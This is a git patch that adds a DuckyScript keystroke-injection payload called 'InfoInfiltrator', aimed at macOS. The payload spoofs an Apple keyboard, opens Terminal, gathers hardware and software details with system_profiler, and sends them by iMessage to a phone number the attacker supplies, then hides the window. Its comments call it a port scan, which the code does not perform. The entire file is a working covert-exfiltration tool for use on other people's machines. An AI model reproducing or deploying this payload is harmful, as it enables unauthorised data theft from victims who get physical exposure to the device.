From 3b11951f27a3e877b9a9d46c6269bcd1053a5cf8 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Tue, 13 Jun 2023 18:34:19 -0500 Subject: [PATCH] added InfoInfiltrator to send info from Mac to iphone --- RECON/InfoInfiltrator.txt | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 RECON/InfoInfiltrator.txt diff --git a/RECON/InfoInfiltrator.txt b/RECON/InfoInfiltrator.txt new file mode 100644 index 0000000..c2a331b --- /dev/null +++ b/RECON/InfoInfiltrator.txt @@ -0,0 +1,34 @@ +REM This script does a Port scan using the targets I.P. +REM then it sends the information from the scan to your phone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + +REM Title: InfoInfiltrator +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI h + + + + + +